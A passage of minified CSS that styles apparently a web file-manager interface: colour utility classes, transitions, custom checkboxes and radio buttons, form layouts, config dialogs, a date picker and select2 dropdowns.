.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice 